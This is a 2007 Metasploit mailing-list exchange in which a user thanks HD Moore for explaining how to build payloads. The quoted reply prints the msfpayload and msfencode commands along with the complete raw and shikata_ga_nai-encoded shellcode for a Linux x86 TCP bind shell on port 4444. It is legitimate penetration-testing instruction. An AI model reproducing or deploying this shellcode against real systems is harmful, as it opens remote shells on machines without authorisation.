Building multistage payloaded exploits?

[j_fast_and_the_furious at hotmail.com (scotty to hotty)]

darn it, and i actually have seen that command too :S i must've whent brain dead :P thnx for the help it really has 
clarified a ton... anyways that will be enough interogating for me tonight. And before i go i must say thanks for all 
the great videos u made AKA defcon speach 15.... i've learn alot on pentesting just on that video.... Patervas the best 
:P


----------------------------------------> From: hdm at metasploit.com> To: framework at metasploit.com> Date: Mon, 24 
Sep 2007 18:10:10 -0500> Subject: Re: [framework] Building multistage payloaded exploits?>> You are probably doing 
something wrong ;-) The msfpayload command only> generates the raw shellcode, if you want to encode it, you need to> 
generate it in "raw" mode, then pass it into msfencode, which takes> the -b parameter defining the bad character set. 
For example:>> $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 C> /*> * linux/x86/shell_bind_tcp - 78 bytes> * 
http://www.metasploit.com> * AppendExit=false, PrependSetresuid=false,> * PrependSetuid=false, LPORT=4444, 
PrependSetreuid=false> */> unsigned char buf[] => "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"> 
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"> 
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"> 
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"> 
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"> "\x0b\xcd\x80";>> # now, lets remove the 0xcd and 
0x80>> $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | \> msfencode -a x86 -b '\xcd\x80' -t c>> [*] 
x86/shikata_ga_nai succeeded, final size 106>> unsigned char buf[] => 
"\xba\x03\x52\xce\x1e\x29\xc9\xd9\xe9\xb1\x14\xd9\x74\x24\xf4"> 
"\x5f\x31\x57\x13\x83\xef\xfc\x03\x57\x0f\xe2\xf6\x63\x15\xe9"> 
"\x1b\xd0\xea\x45\xb1\xd5\x65\x88\xf5\xbc\xb8\xcb\xae\x1e\x11"> 
"\xa4\xaf\x9d\x84\x68\x25\xb2\xf7\xc0\x30\x53\x9d\x86\x1a\x59"> 
"\xe2\xce\xdb\x65\x50\xd4\x6b\x03\x5b\x55\xc8\x7c\x05\x9b\x4e"> 
"\xef\x93\x49\x71\x48\xe9\x0e\xc4\x11\x09\x66\xf9\xce\x9a\x1f"> 
"\x6d\x3e\x3f\x89\x03\xc9\x5c\x19\x88\x40\x43\x2a\x25\x9e\x04"> "\x41";>>> -HD>> On Monday 24 September 2007 18:02, 
scotty to hotty wrote:>> Thnx hdm for clarifying my research :P. now, i noticed problems when i>> specify bad 
characters in metasploit.... it always spits the payload>> out with the bad characters still in the exploit.... when i 
use msf2 it>> works fine but when i use msf3 it keeps everything i specify to get>> removed. any work arrounds to this 
problem? or am i doing something>> wrong?

_________________________________________________________________
Connect to the next generation of MSN Messenger?
http://imagine-msn.com/messenger/launch80/default.aspx?locale=en-us&source=wlmailtagline